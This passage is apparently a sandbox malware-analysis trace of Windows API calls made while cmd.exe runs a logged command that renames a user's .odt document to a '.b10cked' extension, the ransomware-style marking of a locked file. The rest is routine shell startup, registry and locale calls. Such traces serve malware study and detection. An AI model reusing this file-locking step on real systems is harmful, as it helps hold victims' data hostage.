AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.369] GetConsoleOutputCP () returned 0x1b5 [0140.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.369] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.369] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.370] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.370] GetEnvironmentStringsW () returned 0x3d0180* [0140.371] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0140.371] GetEnvironmentStringsW () returned 0x3d0180* [0140.371] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0140.371] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edcc | out: phkResult=0x26edcc*=0x40) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0xa8, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x0, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.371] RegCloseKey (hKey=0x40) returned 0x0 [0140.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edcc | out: phkResult=0x26edcc*=0x40) returned 0x0 [0140.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x40, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26edd4, 
lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x1, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x0, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x4, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x4) returned 0x0 [0140.372] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26edd4, lpData=0x26edd8, lpcbData=0x26edd0*=0x1000 | out: lpType=0x26edd4*=0x0, lpData=0x26edd8*=0x9, lpcbData=0x26edd0*=0x1000) returned 0x2 [0140.372] RegCloseKey (hKey=0x40) returned 0x0 [0140.372] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.372] srand (_Seed=0x5b88636e) [0140.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" [0140.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" [0140.372] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.372] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.373] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.373] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.373] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.373] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.373] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.373] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.373] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.373] GetEnvironmentStringsW () returned 0x3d22d0* [0140.373] FreeEnvironmentStringsW (penv=0x3d22d0) returned 1 [0140.373] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.373] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.373] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.373] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.373] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.373] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0140.373] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.374] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fb98, lpFilePart=0x26fb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fb94*="Desktop") returned 0x18 [0140.374] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f914 | out: lpFindFileData=0x26f914) returned 0x3d0010 [0140.374] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0140.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.375] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.375] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.375] GetEnvironmentStringsW () returned 0x3d2af0* [0140.375] FreeEnvironmentStringsW (penv=0x3d2af0) returned 1 [0140.375] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.375] GetConsoleOutputCP () returned 0x1b5 [0140.376] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.376] GetUserDefaultLCID () returned 0x409 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="0") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="0") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fcd8, cchData=128 | out: lpLCData="1") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.378] GetConsoleTitleW (in: lpConsoleTitle=0x3c08e0, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.378] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.379] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.379] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.379] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.379] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.379] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.379] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.379] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.382] GetConsoleTitleW (in: lpConsoleTitle=0x26f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.918] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.918] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.918] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.918] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.918] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.918] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.919] _wcsicmp (_String1="move", _String2="TIME") returned -7 
[0140.919] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.919] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.919] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.919] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.919] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.919] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.919] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.919] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.919] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.919] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.919] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.919] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.919] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.921] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f78c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f784, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f784*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.921] _wcsnicmp (_String1="COPYCMD", 
_String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.921] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) 
returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.922] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.922] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2=".") returned 2 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2="..") returned 2 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.923] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.923] SetErrorMode (uMode=0x0) returned 0x0 [0140.923] SetErrorMode (uMode=0x1) returned 0x0 [0140.923] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26f114, lpFilePart=0x26f0fc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x26f0fc*="0Q56T.odt") returned 0x2c [0140.923] SetErrorMode (uMode=0x0) returned 0x1 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0140.923] _wcsicmp (_String1="0Q56T.odt", _String2=".") returned 2 
[0140.923] _wcsicmp (_String1="0Q56T.odt", _String2="..") returned 2 [0140.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.923] SetErrorMode (uMode=0x0) returned 0x0 [0140.923] SetErrorMode (uMode=0x1) returned 0x0 [0140.923] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26f590, lpFilePart=0x26f328 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x26f328*="0Q56T.odt") returned 0x2c [0140.923] SetErrorMode (uMode=0x0) returned 0x1 [0140.924] SetErrorMode (uMode=0x0) returned 0x0 [0140.924] SetErrorMode (uMode=0x1) returned 0x0 [0140.924] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", nBufferLength=0x104, lpBuffer=0x26f798, lpFilePart=0x26f328 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", lpFilePart=0x26f328*="0Q56T.odt.b10cked") returned 0x34 [0140.924] SetErrorMode (uMode=0x0) returned 0x1 [0140.924] SetLastError (dwErrCode=0x0) [0140.924] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt.b10cked")) returned 0xffffffff [0140.924] GetLastError () returned 0x2 [0140.924] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", fInfoLevelId=0x1, lpFindFileData=0x26eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eca4) returned 0x3c0e70 [0140.924] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x26eca4 | out: lpFindFileData=0x26eca4) returned 0 [0140.925] GetLastError () returned 0x12 [0140.925] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0140.925] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", fInfoLevelId=0x1, 
lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0140.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", nBufferLength=0x104, lpBuffer=0x26ef3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", lpFilePart=0x0) returned 0x34 [0140.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26ef3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x0) returned 0x2c [0140.926] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.926] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt.b10cked"), dwFlags=0x3) returned 1 [0140.926] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0140.927] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eef0 | out: _Buffer=" 1") returned 9 [0140.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.927] GetFileType (hFile=0x7) returned 0x2 [0140.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ee7c | out: lpMode=0x26ee7c) returned 1 [0140.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eeb0 | out: lpConsoleScreenBufferInfo=0x26eeb0) returned 1 [0140.927] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | 
out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eef0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eed4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eed4*=0x1a) returned 1 [0140.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.929] SetConsoleInputExeNameW () returned 0x1 [0140.929] GetConsoleOutputCP () returned 0x1b5 [0140.929] GetCPInfo (in: 